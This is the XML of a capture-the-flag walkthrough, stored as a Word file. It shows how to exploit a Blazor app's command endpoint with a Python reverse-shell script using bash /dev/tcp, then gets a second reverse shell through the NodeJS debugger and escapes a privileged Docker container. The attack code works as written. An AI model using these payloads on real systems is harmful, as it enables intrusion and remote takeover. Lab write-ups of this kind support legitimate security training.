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BLAZOR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9a5dtscwwgu"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yjkag4et1qha"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692400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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cnb1yizgqmvd"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mg56qoi9hypt"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99axd6ly0njx" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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2">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3000 - NODEJS/EXPRESS</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port 3000:</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7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only have a message saying that this application is privileged. Let’s take a look at port 80:</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7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7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notice that this is an application built using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blazor framework</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Blazor (Browser + Razor)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a web framework based on HTML and CSS that uses C# and Razor instead of JavaScript and runs via WebAssembly.</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WebAssembly </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Wasm)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a new portable, lightweight format with efficient load time, suitable for web compilation. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://webassembly.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  The browser functions as a virtual machine running Wasm (binary code).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requests through the Firefox Web Console, we can see that some DLLs are loaded.</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03500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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download the DLL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Commander.Client.dll</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply by double-clicking on it. After downloading it, we can use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dnSpy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https://github.com/dnSpy/dnSpy</w:t>
        </w:r>
      </w:hyperlink>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dnSpy is a .NET debugger and assembly editor. You can use it to edit and debug assemblies even if no source code is available.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loading the DLL into dnSpy, we can see something interesting (Note: Windows).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7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intercept the request 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/api/Commander</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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5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notice that we can execute the commands: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list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execute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we change the request method to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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a Token is required.</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add the Token to the header. We also notice that we need to pass something in the body, and looking at the response header, we see that the Content-Type is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json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5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type is JSON, we can pass the following in the body:</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notice that the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value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required, so we will provide it.</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6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RCE (Remote Code Execution), however, we have some issues when passing commands with more than one parameter.</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6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wrap our command in single quotes:</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6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only the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls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was executed; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was ignored. Therefore, we need to bypass the space using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${IFS}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7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server does not have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</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curl</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netcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc., we can quickly create a script that will return a reverse shell.</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below will take our IP and port as arguments, then encode a reverse shell in base64 and save the decoded payload in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After that, it will send a request to execute it:</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#!/usr/bin/python3</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#Author: Vert16x</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 base64, json, requests</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url = "http://&lt;IP-MACHINE&gt;/api/Commander" # &lt;-- CHANGE IP-MACHINE</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headers = {"Authorization": "TOKEN ff902e2e-e8e0-4344-b0bd-487e467364c5",</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"Content-Type": "application/json"</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proxies = {"http":"http://127.0.0.1:8080"}</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GenerateReverseShell():</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IpAddress = sys.argv[1]</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Port = sys.argv[2]</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PayloadReverseShell = f"bash -i &gt;&amp; /dev/tcp/{IpAddress}/{Port} 0&gt;&amp;1".encode("utf-8")</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EncodedPayload = base64.b64encode(PayloadReverseShell)</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Base64ReverseShell = EncodedPayload.decode("utf-8")</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 Base64ReverseShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:jc w:val="both"/>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GetShell():</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Payload = GenerateReverseShell()</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GetRev = {"command":"execute",</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"value":"'echo${IFS}-n${IFS}%s${IFS}&gt;${IFS}payload64'"%(Payload)}</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SendRev = {"command":"execute",</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"value":"'cat${IFS}payload64$IFS|${IFS}base64$IFS-d${IFS}&gt;${IFS}shell.sh'"}</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ExecRev = {"command":"execute",</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"value":"'bash${IFS}shell.sh'"}</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requests.post(url,data=json.dumps(GetRev),headers=headers)</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requests.post(url,data=json.dumps(SendRev),headers=headers)</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requests.post(url,data=json.dumps(ExecRev),headers=headers)</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__name__ == '__main__':</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len(sys.argv) != 3:</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print(f"Usage: {sys.argv[0]} 10.10.10.1 4444")</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sys.exit()</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GetShell()</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09800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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script:</w:t>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7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script, we receive the shell.</w:t>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6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lzaqrskuzs2y" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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fully interactive TTYs.</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first flag at → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/flag.txt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6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enumeration inside this Docker container, we were not able to find anything that would allow us to escape it.</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container does not have many binaries available, we can use a trick.</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configure the Burp Suite proxy so that the container gains internet access. This way, we can install any tools we need since we are root inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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5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proxy configured, the container will use our internet connection to download tools.</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7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updating, we can install </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is part of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net-tools</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.</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7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running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -nlapt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can see that the main host is sharing the network interface with the container. We notice an interesting port → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9229</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6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quick search reveals that this is the NodeJS debugging port. Knowing this, we can achieve RCE by exploiting it.</w:t>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Node inspector / CEF debug abuse</w:t>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hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse</w:t>
        </w:r>
      </w:hyperlink>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install NodeJS inside our container:</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80"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7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5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execute:</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node inspect 127.0.0.1:9229</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the debugger:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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debug&gt; exec("process.mainModule.require('child_process').exec(\"/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'\")")</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82"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a shell in another container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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8"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fully interactive TTYs.</w:t>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9"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know this is a privileged container (based on the hint from the application on port 3000), we can escape it by mounting the main host’s filesystem into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing us to retrieve the final flag.</w:t>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Docker Breakout / Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Abusing Docker Socket for Privilege Escalation</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hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privileged</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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66"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mounting the host filesystem, we access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/root </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nd retrieve the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:rPr/>
      </w:pP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9">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9" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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Blazor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6.png"/><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image" Target="media/image1.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><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8.png"/><Relationship Id="rId25"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7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://webassembly.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dnSpy/dnSpy" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privileged" TargetMode="External"/><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2nC275wIcZlS/3q0aW7yxT11AQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg1oLjlhNWR0c2N3d2d1Mg5oLnlqa2FnNGV0MXFoYTIOaC5jbmIxeWl6Z3FtdmQyDmgubWc1NnFvaTloeXB0Mg5oLjk5YXhkNmx5MG5qeDIOaC5semFxcnNrdXpzMnkyDmguMTc1ZjVjczk0ejBvOAByITEzMGtWWmNKTk40dGZKVUdRS0N0T002c09MNVB0WkVr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